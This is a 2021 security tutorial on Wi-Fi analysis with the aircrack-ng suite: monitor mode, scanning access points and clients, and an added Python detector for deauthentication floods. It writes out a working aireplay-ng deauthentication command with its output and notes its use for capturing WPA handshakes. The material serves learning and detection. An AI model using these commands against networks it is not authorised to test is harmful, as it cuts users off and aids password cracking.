Wireless analysis

January 19, 2021 by Srinivas

In this article, we will discuss how to perform wireless analysis, specifically on Wi-Fi networks. We will use an external Wi-Fi card for active packet capture and learn what information can be identified by capturing and analyzing 802.11 management traffic.

This information commonly includes:

  • Broadcast SSIDs
  • Access point MAC addresses
  • Supported encryption/authentication algorithms
  • Associated client MAC addresses


Monitoring traffic using aircrack-ng suite of tools

The aircrack-ng suite is the most popular free set of tools for Wi-Fi security assessments, and it is worth understanding how some of these tools are used for wireless analysis. These tools are also commonly used by penetration testers.

Regardless of the tools used, it is important to know how to analyze 802.11 traffic in order to understand important aspects such as who is broadcasting the packets and who is connected to a specific access point.

Check the wireless interfaces available

We are going to use an external Wi-Fi card connected over USB to a Linux virtual machine, Kali Linux in this case. The following output of the iwconfig command shows the available wireless interfaces on the machine.

# iwconfig
wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

eth0      no wireless extensions.

lo        no wireless extensions.

wlan0 is the available wireless interface in this case.

One of the first steps in capturing wireless network traffic is to put the wireless card in monitor mode. The command airmon-ng start wlan0 does this.

# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 rt2800usb Ralink Technology, Corp. RT3572
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

As we can see in the preceding excerpt, the wireless card is now in monitor mode. The new monitor-mode interface is wlan0mon in this case.

Scanning for the surrounding Wi-Fi access points

Once the wireless card is in monitor mode, we can start scanning for the surrounding networks that are within range. This can be done using the following command.

# airodump-ng wlan0mon

Following is the output of the preceding command.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
AC:E4:31:24:C4:93  -37       12        2    0  11  130  WPA2 CCMP   PSK  Garauyu_2.4G
88:54:FE:32:2F:CE  -42       14        0    0   7  270  WPA2 CCMP   PSK  darksnade
78:62:8A:37:D2:B4  -49       12        0    0   5  130  WPA2 CCMP   PSK  ninja
50:62:C1:2B:C5:8D  -49       24        1    0   5  195  WPA2 CCMP   PSK  partytime

The preceding excerpt shows the list of access points within the wireless card's range, the channels the access points are on, their MAC addresses and the type of encryption they are configured with. Following are the details from the preceding example.

  • The BSSID column shows the MAC address of the access point.
  • ESSID shows the SSID (service set identifier) of the access point.
  • The ENC column shows the encryption used, which is WPA2 in this case for all access points.
  • The CH column shows the channel the access point is on.

Monitoring a specific SSID

Clearly, the example shown earlier lists all the access points within range of our wireless card. If we are interested in monitoring a specific access point, we can use the --essid flag and specify the SSID. This looks as follows.

# airodump-ng --essid "partytime" wlan0mon

The output of this command looks as follows.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
50:62:C1:2B:C5:8D  -47        6       18    8   5  195  WPA2 CCMP   PSK  partytime

BSSID              STATION            PWR   Rate    Lost    Frames  Probe
50:62:C1:2B:C5:8D  E6:23:0E:4B:2B:FD  -14    0 -24    338      116

As we can see in the preceding excerpt, the output contains only one access point, named partytime, and it is on channel 5. Routers can broadcast their signals on 11 channels, numbered 1 to 11. The MAC address under the STATION column belongs to the client device that is connected to the access point.

Setting the wireless card to a specific channel

There are scenarios where the wireless card needs to be on the same channel as the target access point. For instance, an attacker who wants to perform a deauthentication attack on a specific victim must be on that channel: the attacker sends deauthentication packets spoofed to look as if they came from the router, and the victim is disconnected from the access point. The card can be put on a specific channel using the airmon-ng utility as shown below.

# airmon-ng start wlan0 5

The preceding command starts monitor mode on the interface wlan0 with the card on channel 5. Once the card is on the same channel as the router, an attacker can start sending deauthentication packets to the victim in order to disconnect it. The following command can be used to achieve this.

# aireplay-ng --deauth 0 -c [DEVICE'S MAC ADDRESS] -a [ROUTER'S MAC ADDRESS] wlan0mon

The 0 represents an unlimited number of deauth packets.

  • -c is the MAC address of the client being targeted.
  • -a is the MAC address of the router.
  • wlan0mon is the name of the network card that is in monitor mode.

Following is the output of the preceding command.

# aireplay-ng --deauth 0 -c E6:23:0E:4B:2B:FD -a 50:62:C1:2B:C5:8D wlan0mon
09:37:33  Waiting for beacon frame (BSSID: 50:62:C1:2B:C5:8D) on channel 5
09:37:34  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|53 ACKs]
09:37:35  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|59 ACKs]
09:37:36  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|58 ACKs]
09:37:37  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|57 ACKs]
09:37:38  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|58 ACKs]
09:37:39  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [31|63 ACKs]
09:37:39  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [16|55 ACKs]
09:37:40  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|52 ACKs]
09:37:41  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|54 ACKs]
09:37:41  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|54 ACKs]
09:37:42  Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|51 ACKs]

At this point, the victim is disconnected from the router. This attack causes a denial of service against the victim.

Additionally, this is useful when an attacker wants to capture the four-way handshake while a station connects to the access point. Understanding how wireless attacks work is one of the key requirements for investigating them.
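As an added example that is not part of the original article, the following Python parses raw 802.11 management frames the way an investigator reviewing a monitor-mode capture would: it pulls the SSID and BSSID from beacon frames (the information listed at the start of the article) and counts deauthentication frames per source, destination and reason code, so that a burst like the one in the aireplay-ng log above stands out. It assumes frames without a radiotap header; the sample frames are constructed here from the BSSID and station MAC shown in the article's airodump-ng output.

```python
import struct
from collections import Counter

MGMT_DEAUTH, MGMT_BEACON = 0xC, 0x8  # management-frame (type 0) subtypes

def mac(raw):
    return ":".join(f"{b:02X}" for b in raw)

def parse_mgmt(frame):
    """Return a dict for beacon/deauth frames, None for other frames (no radiotap header assumed)."""
    if len(frame) < 24:
        return None
    fc, _dur, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", frame[:24])
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0:  # only management frames carry beacons and deauths
        return None
    rec = {"subtype": subtype, "dst": mac(a1), "src": mac(a2), "bssid": mac(a3)}
    body = frame[24:]
    if subtype == MGMT_DEAUTH:
        rec["reason"] = struct.unpack("<H", body[:2])[0]  # 7 = class 3 frame from non-associated STA
    elif subtype == MGMT_BEACON:
        # fixed params: timestamp(8) + interval(2) + capability(2); then tagged params, tag 0 = SSID
        tags, ssid = body[12:], None
        while len(tags) >= 2:
            tid, tlen = tags[0], tags[1]
            if tid == 0:
                ssid = tags[2:2 + tlen].decode("utf-8", "replace")
                break
            tags = tags[2 + tlen:]
        rec["ssid"] = ssid
    return rec

def deauth_floods(frames, threshold=10):
    """(src, dst, reason) triples seen at least `threshold` times: the signature of a directed deauth burst."""
    counts = Counter()
    for frame in frames:
        rec = parse_mgmt(frame)
        if rec and rec["subtype"] == MGMT_DEAUTH:
            counts[(rec["src"], rec["dst"], rec["reason"])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}

# Constructed sample frames using the BSSID and station MAC from the article's airodump-ng output.
AP, STA, BCAST = bytes.fromhex("5062C12BC58D"), bytes.fromhex("E6230E4B2BFD"), b"\xff" * 6

def build(subtype, a1, a2, a3, body):
    return struct.pack("<HH6s6s6sH", subtype << 4, 0, a1, a2, a3, 0) + body

beacon = build(MGMT_BEACON, BCAST, AP, AP, b"\x00" * 12 + bytes([0, 9]) + b"partytime")
deauth = build(MGMT_DEAUTH, STA, AP, AP, struct.pack("<H", 7))  # spoofed: source address is the AP
SAMPLE = [beacon] + [deauth] * 64  # one beacon followed by a 64-frame burst, as in the aireplay-ng log
```

A single deauth with a normal reason code is routine; dozens of identical (src, dst, reason 7) frames in seconds, with the source address equal to the BSSID, is what to look for when confirming the attack from a capture.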


Conclusion

Having an external Wi-Fi card is one of the key requirements for active wireless sniffing and analysis. This article has demonstrated how to use an external wireless card to actively capture and understand wireless traffic.

We used some of the tools from the aircrack-ng suite and also discussed how a deauthentication attack is performed using aireplay-ng.


Srinivas

Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds the Offensive Security Certified Professional (OSCP) certification. He blogs at www.androidpentesting.com. Email: srini0x00@gmail.com